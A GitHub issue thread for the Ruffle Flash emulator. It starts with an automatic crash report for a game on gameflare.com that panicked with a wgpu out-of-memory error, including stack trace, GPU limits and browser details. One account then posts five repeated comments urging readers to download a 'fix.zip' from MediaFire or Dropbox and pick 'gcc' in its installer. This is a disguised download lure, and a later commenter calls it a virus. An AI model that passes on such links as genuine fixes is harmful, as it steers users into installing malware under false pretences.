### ISSUE TITLE
Error on https://www.gameflare.com/embed/monster-arena/

### ISSUE THREAD

**Issue by Kaname6669** [ruffle-rs/ruffle#17645]
# Error Info
Error name: Error
Error message: panicked at /home/runner/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wgpu-22.1.0/src/backend/wgpu_core.rs:3411:5:
wgpu error: Validation Error

Caused by:
  In Device::create_buffer
    Not enough memory left.

Error stack:
```
Error: panicked at /home/runner/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wgpu-22.1.0/src/backend/wgpu_core.rs:3411:5:
wgpu error: Validation Error

Caused by:
  In Device::create_buffer
    Not enough memory left.


    at n.wbg.__wbg_new_796382978dfd4fb0 (https://www.gameflare.com/emulators/ruffle/core.ruffle.1c418e86b251861b5eca.js:1:83857)
    at ruffle_web.wasm.js_sys::Error::new::he5ee53fe8c974231 (wasm://wasm/ruffle_web.wasm-0320043a:wasm-function[12738]:0x9849fe)
    at ruffle_web.wasm.core::ops::function::FnOnce::call_once{{vtable.shim}}::hd277f71cef9d6cd2 (wasm://wasm/ruffle_web.wasm-0320043a:wasm-function[9803]:0x913517)
    at ruffle_web.wasm.std::panicking::rust_panic_with_hook::h47bd3d747ed79dc3 (wasm://wasm/ruffle_web.wasm-0320043a:wasm-function[6265]:0x7f7d18)
    at ruffle_web.wasm.core::panicking::panic_fmt::hb859252f4b513814 (wasm://wasm/ruffle_web.wasm-0320043a:wasm-function[10213]:0x92f03b)
    at ruffle_web.wasm.core::ops::function::Fn::call::h6a322d70a0e95231 (wasm://wasm/ruffle_web.wasm-0320043a:wasm-function[6576]:0x81a541)
    at ruffle_web.wasm.<T as wgpu::context::DynContext>::device_create_buffer::h5e2092ca672e0cc5 (wasm://wasm/ruffle_web.wasm-0320043a:wasm-function[7507]:0x86aa00)
    at ruffle_web.wasm.<wgpu::Device as wgpu::util::device::DeviceExt>::create_buffer_init::hac0ab04e896bf05e (wasm://wasm/ruffle_web.wasm-0320043a:wasm-function[1865]:0x4bda3d)
    at ruffle_web.wasm.ruffle_render_wgpu::buffer_builder::BufferBuilder::finish::hd5f6b960214f3600 (wasm://wasm/ruffle_web.wasm-0320043a:wasm-function[7659]:0x87231b)
    at ruffle_web.wasm.ruffle_render_wgpu::backend::WgpuRenderBackend<T>::register_shape_internal::h7b7a23b2a1ec1c17 (wasm://wasm/ruffle_web.wasm-0320043a:wasm-function[1394]:0x3d8fba)
```

# Player Info
Allows script access: false
Renderer: wgpu
Adapter Backend: Gl
Adapter Name: "ANGLE (Intel, Intel(R) HD Graphics 630 (0x0000591B) Direct3D11 vs_5_0 ps_5_0, D3D11)"
Adapter Device Type: IntegratedGpu
Adapter Driver Name: ""
Adapter Driver Info: "WebGL 2.0 (OpenGL ES 3.0 Chromium)"
Enabled features: Features(TEXTURE_COMPRESSION_BC | FLOAT32_FILTERABLE | TEXTURE_ADAPTER_SPECIFIC_FORMAT_FEATURES)
Available features: Features(DEPTH32FLOAT_STENCIL8 | PUSH_CONSTANTS | CLEAR_TEXTURE | MULTIVIEW)
Current limits: Limits { max_texture_dimension_1d: 16384, max_texture_dimension_2d: 16384, max_texture_dimension_3d: 2048, max_texture_array_layers: 256, max_bind_groups: 4, max_bindings_per_bind_group: 1000, max_dynamic_uniform_buffers_per_pipeline_layout: 8, max_dynamic_storage_buffers_per_pipeline_layout: 0, max_sampled_textures_per_shader_stage: 16, max_samplers_per_shader_stage: 16, max_storage_buffers_per_shader_stage: 0, max_storage_textures_per_shader_stage: 0, max_uniform_buffers_per_shader_stage: 11, max_uniform_buffer_binding_size: 65536, max_storage_buffer_binding_size: 0, max_vertex_buffers: 8, max_buffer_size: 268435456, max_vertex_attributes: 16, max_vertex_buffer_array_stride: 255, min_uniform_buffer_offset_alignment: 256, min_storage_buffer_offset_alignment: 256, max_inter_stage_shader_components: 120, max_color_attachments: 8, max_color_attachment_bytes_per_sample: 32, max_compute_workgroup_storage_size: 0, max_compute_invocations_per_workgroup: 0, max_compute_workgroup_size_x: 0, max_compute_workgroup_size_y: 0, max_compute_workgroup_size_z: 0, max_compute_workgroups_per_dimension: 0, min_subgroup_size: 0, max_subgroup_size: 0, max_push_constant_size: 0, max_non_sampler_bindings: 1000000 }
Surface quality: high
Surface samples: 4
Surface size: (550, 400, 1)

# Page Info
Page URL: https://www.gameflare.com/embed/monster-arena/
SWF URL: https://data.gameflare.com/games/2112/bwbMc0Ih6HDfti.swf

# Browser Info
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Platform: Win32
Has touch support: false

# Ruffle Info
Version: 0.1.0
Name: nightly 2024-08-25
Channel: nightly
Built: 2024-08-25T00:06:04.595Z
Commit: 6fca7444b6b0be3157e1de9f24aa928ec969bd50
Is extension: false

# Metadata
width: 640
height: 480
frameRate: 25
numFrames: 28
swfVersion: 9
backgroundColor: #000000
isActionScript3: true
uncompressedLength: 4277604

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Kaname6669** [comment]
> Download https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 In the installer menu, select "gcc."

dead links

**Comment by everything411** [comment]
@Kaname6669 this is virus
